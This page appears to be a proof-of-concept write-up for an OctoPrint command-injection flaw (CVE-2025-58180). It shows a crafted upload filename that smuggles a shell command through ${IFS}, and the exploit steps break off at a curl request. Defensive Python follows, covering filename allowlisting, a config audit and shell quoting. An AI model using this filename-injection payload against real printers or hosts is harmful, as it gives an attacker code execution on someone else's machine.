Exploit for CVE-2025-58180
Description

CVE-2025-58180: RCE in OctoPrint via Unsanitized Filename in File Upload

In OctoPrint version <=1.11.2, an attacker with file upload access (e.g., a valid API key or session) can craft a malicious filename that bypasses sanitization and is later executed by OctoPrint's event system, leading to remote code execution (RCE) on the host.

PoC: Steps to Recreate Vulnerability

Step 1: Version Info

Downloaded latest stable release: OctoPrint 1.11.2

Step 2: Run OctoPrint

```bash
octoprint serve --port 5000 --debug
```

Open http://127.0.0.1:5000 in a browser. Go through the initial wizard and create a user with default settings (disabled: connectivity, anonymous, plugin). Grab the API key from Settings → API and save it for later. Stop the OctoPrint service once the above steps are done.

Step 3: Configure Event Subscription

Following the OctoPrint events documentation, edit ~/.octoprint/config.yaml:

```yaml
events:
  enabled: true
  subscriptions:
    - event: FileAdded
      type: system
      debug: true
      command: "{path}"
```

Step 4: Create Sample G-code

Create /tmp/gcode/ok.gcode:

```gcode
; minimal gcode
G28
M105
```

Restart the OctoPrint service.

Step 5: Proof of Concept RCE

Export the API key:

```bash
export API_KEY=''
```

Verify the file doesn't exist yet:

```bash
ls -la /tmp/test123
```

Craft the malicious filename payload:

```bash
INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
```

Explanation: ${IFS} is the shell's Internal Field Separator (usually a space). It bypasses sanitization when injected.

Send curl request: curl…
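The root cause above is a user-controlled file name flowing into a `type: system` event command as an unquoted shell word. As an added defensive example (written for this page, not code from the advisory or from OctoPrint), the following Python shows the three controls a maintainer or operator would want: an allowlist check on uploaded names that rejects the page's payload outright, an audit of an OctoPrint-style `events` config that flags `system` subscriptions whose command interpolates payload placeholders such as `{path}`, and a renderer that shell-quotes every substituted value so it can only ever be one argument. The `{path}` placeholder and the `FileAdded` subscription are taken from Step 3; the allowlist pattern, the `PrintDone` sample subscription and the plain-dict config shape (used instead of parsing YAML) are assumptions of the example.

```python
import re
import shlex

# Allowlist for uploaded file names (an assumption of this example; it is
# deliberately stricter than whatever sanitization OctoPrint applies itself).
# Only ASCII letters, digits, '.', '_' and '-' are accepted, the first character
# must be alphanumeric, and the total length is capped.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")

# Matches {placeholder} tokens in an event command template.
PLACEHOLDER = re.compile(r"\{(\w+)\}")


def is_safe_filename(name: str) -> bool:
    """True only for names with no shell metacharacters or path tricks.

    ';', '$', '{', '}', '#', '/', spaces and quotes are all outside the
    allowlist, so a name like 'octo;touch${IFS}/tmp/test123;#.gcode' is
    rejected before it can reach an event command.  '..' is refused as well.
    """
    if ".." in name:
        return False
    return SAFE_FILENAME.fullmatch(name) is not None


def risky_subscriptions(config: dict) -> list:
    """Audit an OctoPrint-style config dict for shell command subscriptions.

    Every enabled 'system' subscription whose command contains a placeholder
    is reported together with the placeholders used: any of those fields may
    carry attacker-influenced data (the file path, in the advisory's case)
    straight into a shell.
    """
    findings = []
    events = config.get("events") or {}
    if not events.get("enabled", False):
        return findings
    for sub in events.get("subscriptions") or []:
        if sub.get("type") != "system":
            continue
        names = PLACEHOLDER.findall(str(sub.get("command", "")))
        if names:
            findings.append({"event": sub.get("event"),
                             "command": sub.get("command"),
                             "placeholders": names})
    return findings


def render_quoted(template: str, payload: dict) -> str:
    """Substitute placeholders with shlex-quoted values.

    Each value becomes exactly one shell word, so ';', '${IFS}' and '#' inside a
    file name are passed literally instead of being parsed.  Running the
    command without a shell at all (an argv list) is the stronger fix; quoting
    is the minimum for templates that must stay shell strings.
    """
    def substitute(match):
        key = match.group(1)
        if key not in payload:
            raise KeyError("unknown placeholder {%s}" % key)
        return shlex.quote(str(payload[key]))
    return PLACEHOLDER.sub(substitute, template)


def shell_word_count(command: str) -> int:
    """Number of words a POSIX shell would see in `command`."""
    return len(shlex.split(command))


# Constructed sample config mirroring the Step 3 subscription, plus a second
# subscription (assumed, not from the page) that interpolates nothing.
SAMPLE_CONFIG = {
    "events": {
        "enabled": True,
        "subscriptions": [
            {"event": "FileAdded", "type": "system", "debug": True,
             "command": "{path}"},
            {"event": "PrintDone", "type": "system",
             "command": "/usr/local/bin/notify-done"},
        ],
    }
}

# The payload name from Step 5 of the page, used here only as test input.
INJECT_NAME = "octo;touch${IFS}/tmp/test123;#.gcode"

if __name__ == "__main__":
    print("allowlist accepts ok.gcode:", is_safe_filename("ok.gcode"))
    print("allowlist accepts payload:", is_safe_filename(INJECT_NAME))
    for finding in risky_subscriptions(SAMPLE_CONFIG):
        print("risky subscription:", finding)
    rendered = render_quoted("{path}", {"path": "/tmp/gcode/" + INJECT_NAME})
    print("quoted command:", rendered, "->", shell_word_count(rendered), "word(s)")
```

The audit and the allowlist are independent layers: the allowlist stops the name at upload time, while the config audit tells an operator which subscriptions would turn any future sanitization gap into command execution. Quoting the interpolated value is what makes the `{path}` template itself safe to keep.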
